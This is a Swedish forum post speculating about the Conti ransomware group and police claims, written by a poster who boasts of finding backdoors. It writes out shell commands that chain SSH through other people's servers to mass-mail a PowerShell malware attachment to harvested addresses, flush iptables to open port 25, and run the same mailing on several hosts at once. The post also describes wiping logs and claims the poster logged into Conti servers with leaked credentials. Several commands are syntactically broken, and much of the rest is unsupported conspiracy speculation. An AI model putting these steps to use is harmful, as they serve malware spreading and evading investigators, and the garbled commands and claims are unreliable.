Nej fan, det har jag rätt i allt absolut inte jag skriver kanske lite lustigt men det är ju frågor som jag har i huvudet som kanske inte skrivs tydligt att alla gånger, men skall försöka förklara. Det finns ju många olika sätt att göra saker på men jag bara funderar lite. jag kan mycket men LÅNGT ifrån allt det är därför är det kul när vettiga människor som du dyker upp som kan bolla tankar och kan komma med dina tankar för då börjar jag ju också tänka efter dom och då kan jag ju börja tänka på ett annat vis typ vilket du har fått mig att göra nu med port 25 te.x, det tänkte jag inte på. Jag har aldrig hållt på med ransomware, windows eller något i den värdeln alls eller blivit smittad eller så men jag tycker det är förbaskat kul att cracka dessa, diassambla dom, göra tekniska analyser, få läsa trafik loggarna från ÄKTA källor och inte några påhittade ctfs ,som på malware-traffic-bytes går jag igenom allt liksom samma som dom och jag har ett extremt drag efter att hitta alla systems svagheter dvs bakdörrar eller manipulera saker och ting för att nå mitt mål så därför blir det väldigt kasnke ensidigt att bara tänka som jag gör för det är ju bara en del av allt, men vi kan ta linux och hur dessa servrar te.x skulle funka för det är där jag har väldigt bred kunskap, låt säga att jag vill få iväg ett par mail från någon annans dator, då kan jag te.x göra såhär:
Kod:
ssh -t user1@server1Glesys \
-t ssh -t user2@server2England \
-t ssh server3England \
'while read line; do mailx -S ${line} \
-a malwarefilen.ps1 < fil_med_mail_addresser_hämtade_från_valfri_pastebin.txt
Ovan kommer först ansluta till server1Glesys, den servern kommer hoppa vidare till server2England och den kommer i sin tur hoppa vidare till server3England för att härifrån skicka iväg mailen. Till server1Glesys har jag naturligtvis en proxy eller vpn eller någon annans mobil telefon eller något publika wifi i någon grannstad som man kommit in i eller så kör man en tor socks på det liksom så är man skyddat från första hoppet till 3-4. Hur fan kan dom veta vem jag är då? Varför gör dom inte såhär funderar jag ju på direkt, men bara för jag kan det kanske inte dom kan det, ingen aning men det är svårt att tänka sig in i deras värld för dom verkar inte vara duktig på samma sak som jag och jag är inte duktig på samma sak som dom då dom verkar arbeta från Windows hela tiden förutom deras tech, han får visa användarna i ransomware gruppen går till och i chattarna skriver dom saker likt "Skulle du kunna dö för att vara säker på att ingen kan knäcka ditt usb med din nyckel på? Så viktig är gpg nyckeln och krypteringen" det visar ju att dom tar säkerheten på ett MYCKET större vis än vad media menar på, dom får dom att låtga som värsta noobsen men dom återkommer ehal tiden om dom kan ta en kula för att de är säkert tillräckligt för inga risker skall tas, de finns i chattarna som sagt att bevittna.
Om port 25 är blockad är det ju inte svårt att rensa iptables om man vill, då kan man te.x skriva följande för att rensa dom:
Kod:
ssh -t user1@server1Glesys -t \
ssh -t user2@server2England -t \
ssh -t server3England \
"iptables -P INPUT ACCEPT; \
iptables -P FORWARD ACCEPT; \
iptables -P OUTPUT ACCEPT"
Så kommer all trafik tillåtas och blocken är rensad på den servern vi vill skicka ifrån. Vill vi köra samma kommando från tre olika boxar kan vi använda parallel eller pssh:
Kod:
sshhpass -p <sshpass> \
ssh -u user user1@server1Glesys user2@server2England server3England -e \
"'while read line; do mailx -S <maillista> -a malwarefilen.ps1"
Och nu kommer du köra samma mail kommando på alla 3 servrar dvs 3 olika boxar på en och samma gång, naturligtvis så måste vi rensa loggarna och historiken och redirecta dom till null och framförallt måste man om man inte är helt ute och cyklar räkna med att servern skickar loggarna till en remote server så det går inte att dölja beroende på hur duktig sysadmin är men det verkar folk ha väldigt liten insyn i också. Dom måste ju fatta att om dom är experter på att skapa malware så måste dom ju räkna med att dom måste veta EXAKT PÅ PRICKEN vad dom gör för att inte bli upptäckta för det finns människor som är mer än skillade åt andra hållet te.x.
Polisen får det att låta som om dom har använt samma server sedan 2014? Det finns ingen som håller på med saker på den nivån som ryssarna om dom ens finns som är så korkade som dom försöker få det att låta det är det som stör mig mest.
Dom har med ALL sannolikhet hackat en srever OM dom ens har gjort det, deras loggar finns att få tillgång till här:
https://share.vx-underground.org/Conti/
Tankar man hem den óch man är intresserad så är det bara att översätta allting som står men samtidigt så är det inte helt omöjligt att dom är rätt korkade för dom använder inte en egen te.x pastebin med burn and read dom använder någon annans? Det räcker att köra upp en egen pastebin på en rad? Skapa en text fil med innehållet man vill den andra skall få ta del av sedan är det bara att använda netcat:
Kod:
while : ; do ( echo -ne "HTTP/1.1 200 OK\r\n" ; cat textfilen.txt; ) | nc -l -p 8080 ; done
Nu kan den andra personen gå in på sidan genom
http://iptillservern:8080 när personen läst, raderar man filen med shred, for i in {1..7}; do shred textfilen.txt; done så skrivs den över 7 gånger te.x, det går i python med att göra skit lätt på en rad. Men dom använder andras pastebin? Det är inga proffs på det viset att försöka vara anonyma på RIKTIGT men ja vi alla kan väl olika men hur vågar dom använda någon annans tjänst när dom håller på med det dom gör, dom bryr sig kanske inte ingen aning många vill ju bara hacka utan att tänka på konsekvenserna, man måste veta hur man döljer sig också de är ju A och O för ett proffs men dom lyckas ändå rätt bra eftersom att ingen kan hitta dom eller ta dom antagligen så de finns säkert andra metoder att göra saker på. Men enligt chattarna, använder dom vanliga vpner hela tiden och ber om pengar för nya hela tidne dom använder aldrig sin egen ip. Hur kan svenska polisen veta vilka som är bakom det ena eller andra? Det är det jag undrar också, det är ju bara löjligt.
När läckorna om chattarna kom hämtade jag dom OMEDELBART naturligtvis, i chattarna finns det inloggningar till vissa av deras servrar och tro det eller ej, dom användes fortfarande och på det viset kunde jag ta mig in hos dom te.x. Dom tänker inte på försvar för 5öre dom tänker bara på sina cash typ och i loggarna avslöjas ALLT om hur dom jobbar, det var ju samma månad som hon menar på att servern togs.
En annan sak som är väl intressant, det är att just CONTI som hon menar på är "TA505" om man googlar eller det är dom som dyker upp på några enstaka tweets egentligen heter dom det andra namnet nuv ad det var för siffror.
Jag tror det var igår jag såg att Conti meddelade att dom slutar med all verksamhet med omedelbar verkan? Igår? Jag följer deras bloggar typ för att de är roligt och jag tycker ingenting av värde kommer upp och allting läcks till 100% det betyder företagen inte betalar antagligen, så vart är miljarderna myndigheterna pratar om att ransomware gängen tjänar i Ryssland? Idag, dagen efter deras beslut så kommer denna åklagaren ut och säger att dom tagit en server? Var det dom själva och spelar ett spel för galleriet? Dom vill komma åt ryssland för varje pris som går. Hur kan ryssarna har bättre kunskap om Microsoft och Alla system som finns när det inte är ryssarna som skapat systemen ens? Vilka har bäst insyn i hur det fungerar? Antagligen dom som skapat systemet?
Det är för dumt för att vara sant, som Methos skriver det finns ingen "bas" som dom har sina saker på och därför rekommenderar jag att läsa Conti chattarna och översätta i translate te.x, där ser ni att dom inte jobbar så som det framstås av myndigheterna därför tror jag inte på något av det dom säger, dom hackar vpser ELLER så betalar dom bara vpser som erbjuder KRYPTOVALUTA. Dom handlar ju inte på sitt egna kort direkt? wtf
Hade inte Conti åkt fast av FBI redan 2021-06? Tydligen inte? Det är Gabr och gänget, inga jag vet vilka det är personligne bara följt upp allt och lite till om dom och dom är vanliga arbetar på samsung och troligtvis kanske hjälper dom myndigheten inte fan vet jag, men har svårt att se hur ryssar som är unga har bättre koll på hur microsoft fungerar och dess stängda kod och sedan kommer ni i alla system? 96% använder linux på server sidan eller superdatorer, 4% av microsoft servrar kan inte vara såhär sårbara utan att det är någon av dom själva som är involverad. Nu minns jag inte det var ett tagsen men kollar man på ledarens facebook så visar han lite exploits och så men nej, jag har svårt att tro att dessa saker är möjligt i den stora skala det sker utan att man gör ett ändaste misstag utan att ha resurser till det. Ve4m har resurser in i allas system genom skicka updates m.m? MIcrosoft, Apple m.m därför tror jag de kan vara dom själva dvs för i USA är företag inte allt för sällan tvugna att samarbeta med te.x FBI.
OM NU DET VAR RYSSAR SOM HADE INSYN I VÅRAN VERKSAMHET... Då är det ju fantastiskt att ingen har råkat ut för ransomware i Sverige alltså av våra isper, eller el bolag och sådant menar jag? Vad är problemet? Det är USA som drabbas och ligger på hela tiden. Varför har dom inte sänkt hela sverige med ransomware om dom haft möjligheten? Ifrågasätter man denna åklagare bara på dessa punkter så är det ju uppenbart ratt ingen skada har skett i form av ransomware, eller vilken myndighet i sverige har drabbats av det? Det handlar om cardsharing m,m jag kan inte mycket om det men det är extrema förluster för mediebolagen. Dom hittade på raiden mot 60 servrar och likaså denna gången för det är något annat som sker i bakgrunden som inte skall få uppmärksamhet, men som sagt jag vet inte 100% men troligtvis är det såhär.